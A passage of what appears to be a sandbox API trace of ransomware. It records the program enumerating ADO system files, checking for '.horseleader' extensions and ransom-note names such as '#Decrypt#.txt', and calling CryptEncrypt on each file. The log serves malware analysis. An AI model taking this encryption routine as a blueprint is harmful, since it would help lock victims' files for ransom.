(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.978] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.978] CloseHandle (hObject=0x158) returned 1 [0250.978] GetProcessHeap () returned 0x780000 [0250.978] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.978] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6129cc5, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x6129cc5, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x80fe7780, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0250.978] lstrcmpiW (lpString1="msader15.dll", lpString2="Windows") returned -1 [0250.978] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 57 [0250.978] StrStrIW (lpFirst="msader15.dll", lpSrch=".horseleader") returned 0x0 [0250.978] lstrcmpW (lpString1="msader15.dll", lpString2="#Decrypt#.txt") returned 1 [0250.978] lstrcmpW (lpString1="msader15.dll", lpString2="_uninstalling_.png") returned 1 [0250.978] lstrlenW (lpString=".testttjffg") returned 11 [0250.979] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll", lpSrch=".testttjffg") returned 0x0 [0250.979] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.979] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.979] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7da10b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8f7da10b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8f80026c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x16e000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado15.dll", cAlternateFileName="")) returned 1 [0250.979] lstrcmpiW (lpString1="msado15.dll", lpString2="Windows") returned -1 [0250.979] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 56 [0250.979] StrStrIW (lpFirst="msado15.dll", lpSrch=".horseleader") returned 0x0 [0250.979] lstrcmpW (lpString1="msado15.dll", lpString2="#Decrypt#.txt") returned 1 [0250.979] lstrcmpW (lpString1="msado15.dll", lpString2="_uninstalling_.png") returned 1 [0250.979] lstrlenW (lpString=".testttjffg") returned 11 [0250.979] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll", lpSrch=".testttjffg") returned 0x0 [0250.980] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.981] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833eacc3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x833eacc3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x833eacc3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado20.tlb", cAlternateFileName="")) returned 1 [0250.981] lstrcmpiW (lpString1="msado20.tlb", lpString2="Windows") returned -1 [0250.981] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 56 [0250.981] StrStrIW (lpFirst="msado20.tlb", lpSrch=".horseleader") returned 0x0 [0250.981] lstrcmpW (lpString1="msado20.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.981] lstrcmpW (lpString1="msado20.tlb", lpString2="_uninstalling_.png") returned 1 [0250.981] lstrlenW (lpString=".testttjffg") returned 11 [0250.981] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", lpSrch=".testttjffg") returned 0x0 [0250.981] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.981] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.981] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833eacc3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x833eacc3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x833eacc3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado21.tlb", cAlternateFileName="")) returned 1 [0250.982] lstrcmpiW (lpString1="msado21.tlb", lpString2="Windows") returned -1 [0250.982] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 56 [0250.982] StrStrIW (lpFirst="msado21.tlb", lpSrch=".horseleader") returned 0x0 [0250.982] lstrcmpW (lpString1="msado21.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.982] lstrcmpW (lpString1="msado21.tlb", lpString2="_uninstalling_.png") returned 1 [0250.982] lstrlenW (lpString=".testttjffg") returned 11 [0250.982] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", lpSrch=".testttjffg") returned 0x0 [0250.982] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.982] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.982] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83410e23, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83410e23, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83410e23, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado25.tlb", cAlternateFileName="")) returned 1 [0250.982] lstrcmpiW (lpString1="msado25.tlb", lpString2="Windows") returned -1 [0250.982] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 56 [0250.983] StrStrIW (lpFirst="msado25.tlb", lpSrch=".horseleader") returned 0x0 [0250.983] lstrcmpW (lpString1="msado25.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.983] lstrcmpW (lpString1="msado25.tlb", lpString2="_uninstalling_.png") returned 1 [0250.983] lstrlenW (lpString=".testttjffg") returned 11 [0250.983] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb", lpSrch=".testttjffg") returned 0x0 [0250.983] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.983] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.983] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83410e23, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83410e23, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83410e23, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado26.tlb", cAlternateFileName="")) returned 1 [0250.983] lstrcmpiW (lpString1="msado26.tlb", lpString2="Windows") returned -1 [0250.983] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned 56 [0250.983] StrStrIW (lpFirst="msado26.tlb", lpSrch=".horseleader") returned 0x0 [0250.984] lstrcmpW (lpString1="msado26.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.984] lstrcmpW (lpString1="msado26.tlb", lpString2="_uninstalling_.png") returned 1 [0250.984] lstrlenW (lpString=".testttjffg") returned 11 [0250.984] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb", lpSrch=".testttjffg") returned 0x0 [0250.984] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.984] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.985] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83436f83, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83436f83, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8345d0e3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado27.tlb", cAlternateFileName="")) returned 1 [0250.985] lstrcmpiW (lpString1="msado27.tlb", lpString2="Windows") returned -1 [0250.985] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned 56 [0250.985] StrStrIW (lpFirst="msado27.tlb", lpSrch=".horseleader") returned 0x0 [0250.985] lstrcmpW (lpString1="msado27.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.985] lstrcmpW (lpString1="msado27.tlb", lpString2="_uninstalling_.png") returned 1 [0250.985] lstrlenW (lpString=".testttjffg") returned 11 [0250.985] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb", lpSrch=".testttjffg") returned 0x0 [0250.985] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.985] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.986] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83483244, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83483244, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83483244, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado28.tlb", cAlternateFileName="")) returned 1 [0250.986] lstrcmpiW (lpString1="msado28.tlb", lpString2="Windows") returned -1 [0250.986] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned 56 [0250.986] StrStrIW (lpFirst="msado28.tlb", lpSrch=".horseleader") returned 0x0 [0250.986] lstrcmpW (lpString1="msado28.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.986] lstrcmpW (lpString1="msado28.tlb", lpString2="_uninstalling_.png") returned 1 [0250.986] lstrlenW (lpString=".testttjffg") returned 11 [0250.986] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb", lpSrch=".testttjffg") returned 0x0 [0250.986] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.986] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.986] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.986] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ec495ee, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9ec495ee, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ec6f74e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x72000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadomd.dll", cAlternateFileName="")) returned 1 [0250.986] lstrcmpiW (lpString1="msadomd.dll", lpString2="Windows") returned -1 [0250.987] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned 56 [0250.987] StrStrIW (lpFirst="msadomd.dll", lpSrch=".horseleader") returned 0x0 [0250.987] lstrcmpW (lpString1="msadomd.dll", lpString2="#Decrypt#.txt") returned 1 [0250.987] lstrcmpW (lpString1="msadomd.dll", lpString2="_uninstalling_.png") returned 1 [0250.987] lstrlenW (lpString=".testttjffg") returned 11 [0250.987] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll", lpSrch=".testttjffg") returned 0x0 [0250.987] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.987] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.987] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62a6a67, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x62a6a67, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x625a7ad, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadomd28.tlb", cAlternateFileName="")) returned 1 [0250.987] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="Windows") returned -1 [0250.987] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned 58 [0250.987] StrStrIW (lpFirst="msadomd28.tlb", lpSrch=".horseleader") returned 0x0 [0250.987] lstrcmpW (lpString1="msadomd28.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.987] lstrcmpW (lpString1="msadomd28.tlb", lpString2="_uninstalling_.png") returned 1 [0250.987] lstrlenW (lpString=".testttjffg") returned 11 [0250.987] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", lpSrch=".testttjffg") returned 0x0 [0250.988] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.988] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.989] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad50fa2, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ad50fa2, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ad50fa2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msador15.dll", cAlternateFileName="")) returned 1 [0250.989] lstrcmpiW (lpString1="msador15.dll", lpString2="Windows") returned -1 [0250.990] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned 57 [0250.990] StrStrIW (lpFirst="msador15.dll", lpSrch=".horseleader") returned 0x0 [0250.990] lstrcmpW (lpString1="msador15.dll", lpString2="#Decrypt#.txt") returned 1 [0250.990] lstrcmpW (lpString1="msador15.dll", lpString2="_uninstalling_.png") returned 1 [0250.990] lstrlenW (lpString=".testttjffg") returned 11 [0250.990] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll", lpSrch=".testttjffg") returned 0x0 [0250.990] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.990] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.990] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9debf8b5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9debf8b5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9dee5a15, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadox.dll", cAlternateFileName="")) returned 1 [0250.990] lstrcmpiW (lpString1="msadox.dll", lpString2="Windows") returned -1 [0250.990] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned 55 [0250.990] StrStrIW (lpFirst="msadox.dll", lpSrch=".horseleader") returned 0x0 [0250.990] lstrcmpW (lpString1="msadox.dll", lpString2="#Decrypt#.txt") returned 1 [0250.990] lstrcmpW (lpString1="msadox.dll", lpString2="_uninstalling_.png") returned 1 [0250.990] lstrlenW (lpString=".testttjffg") returned 11 [0250.991] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll", lpSrch=".testttjffg") returned 0x0 [0250.991] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.991] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.991] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.991] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fd3080, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x5fd3080, 